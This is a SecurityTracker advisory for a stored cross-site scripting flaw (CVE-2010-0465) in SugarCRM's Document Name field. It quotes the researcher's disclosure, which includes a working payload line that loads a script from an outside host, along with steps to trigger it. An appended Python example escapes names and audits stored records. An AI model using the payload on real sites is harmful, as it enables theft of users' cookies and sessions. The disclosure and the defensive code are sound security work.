SecurityTracker
Archives
Category:   Application (Forum/Board/Portal)  >   SugarSales (SugarCRM)
Vendors:   SugarCRM Inc.
SugarCRM Input Validation Flaw in Document Name Permits Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1023722
SecurityTracker URL:  http://securitytracker.com/id/1023722
CVE Reference:   CVE-2010-0465
Date:  Mar 17 2010
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available:  Yes
Vendor Confirmed:  Yes
Exploit Included:  Yes
Version(s): prior to 5.5.0a and 5.2.0l
Description:   A vulnerability was reported in SugarCRM. A remote user can conduct cross-site scripting attacks.

The software does not properly filter HTML code from user-supplied input before displaying the input. A remote user can create a specially crafted value that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the SugarCRM software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

The document name field is affected in the Documents section.

The vendor was notified on February 18, 2010.

Jeromie Jackson reported this vulnerability.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the SugarCRM software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   The vendor has issued a fix (5.5.0a and 5.2.0l).

The vendor's advisory is available at:

http://www.sugarcrm.com/crm/support/documentation/SugarCommunityEdition/5.2/-docs-Release_Notes-Sugar_CommunityEdition_ReleaseNotes_5.2.0l-Sugar_Release_Notes_5.2.0l.html

Vendor URL:  www.sugarcrm.com/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  SugarCRM Stored XSS vulnerability

Class: Stored Cross Site Scripting (XSS)

CVE: CVE-2010-0465

Remote: Yes 

Local: Yes 

Published: Jan 1, 2010 12:01AM

Timeline: Submission to Mitre: January 29, 2010

Vendor Contact: February 18, 2010

Vendor Response: February 19, 2010

Patch Available: March 10, 2010

Credit: Jeromie Jackson CISSP, CISM

COBIT & ITIL Certified

President- San Diego Open Web Application Security Project (OWASP)

Vice President- San Diego Information Audit & Control Association (ISACA)

SANS Mentor

Blog: www.JeromieJackson.com

Twitter: www.twitter.com/Security_Sifu


Validated Vulnerable: 

All previous versions of SugarCRM prior to 5.5.0a and 5.2.0l


Discussion: 


A Stored Cross-Site Scripting (XSS) vulnerability was found within
SugarCRM. The vulnerability is exploited through the online Documents
section of the application. By crafting a name that includes XSS code it
is possible to inject malicious data, redirect the user to a bogus
replica of the real website, or other nefarious activity.



Exploit: 

There are two ways that have been used to exploit this vulnerability. In
both instances, make a document with the following Document Name: 


pwn3d<SCRIPT SRC="http://www.jeromiejackson.com/sugarcrm.js"></SCRIPT>



Example #1


Within the SugarCRM User Interface (UI) go to the Documents List. Click
on the one just created. This will execute the script. You will see the
script right in the document list- very obvious to most users that
something doesn't look right. The next example is slightly more covert.



Example #2


Within the SugarCRM UI go to the Document List. Hover over the Document
Name you just created, right-click, and then copy the URL location. You
will see the URL does not have any of the scripting; it has been
replaced with queries directly to a Record variable within the
application. This would probably be the tack a Phisher would take.



Solution: 

A patch has been made available via the vendor. It is recommended a
routine to sanitize user input be consistently implemented throughout
the application to mitigate other such occurrences within the
application.
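As an added example (not SugarCRM's code and not part of the advisory above), the two defender-side steps the solution paragraph implies: encode the document name for the HTML context in which the Documents list displays it, and audit stored names after patching, since a stored payload remains in the database until the record is cleaned. The field names, the detail-view URL layout and the sample records are assumptions; the second sample name is the payload quoted in the advisory.

```python
import html
import re
from urllib.parse import quote

# Constructed sample of stored Documents records (hypothetical field names).
# doc-2 carries the document name quoted in the advisory above.
DOCUMENTS = [
    {"id": "doc-1", "document_name": "Q1 Sales Plan.pdf"},
    {"id": "doc-2", "document_name":
        'pwn3d<SCRIPT SRC="http://www.jeromiejackson.com/sugarcrm.js"></SCRIPT>'},
    {"id": "doc-3", "document_name": "Notes <draft> & review"},
]

# Anything that looks like the start of an HTML tag; deliberately broad so the
# audit errs toward flagging records for a human to look at.
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z]")

# Assumed detail-view link layout, modelled on the "Record variable" the
# advisory describes; not taken from SugarCRM source.
DETAIL_VIEW = "index.php?module=Documents&action=DetailView&record="


def render_list_row(doc):
    """Render one Documents-list row with the name encoded for its context.

    The link text is HTML-escaped (including quotes), so a stored name that
    contains markup is shown literally instead of being parsed by the browser;
    the record id in the href is URL-encoded, and the href attribute value is
    HTML-escaped as a whole.
    """
    name = html.escape(doc["document_name"], quote=True)
    href = html.escape(DETAIL_VIEW + quote(doc["id"], safe=""), quote=True)
    return f'<tr><td><a href="{href}">{name}</a></td></tr>'


def audit_document_names(docs):
    """Return ids of stored documents whose name contains tag-like markup.

    Upgrading removes the injection point but not records written before the
    fix, so existing names need review. Legitimate names such as
    "Notes <draft>" are flagged too; the list is a review queue, not a verdict.
    """
    return [d["id"] for d in docs if TAG_RE.search(d["document_name"])]


if __name__ == "__main__":
    for d in DOCUMENTS:
        print(render_list_row(d))
    print("review:", audit_document_names(DOCUMENTS))
```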


Copyright 2021, SecurityGlobal.net LLC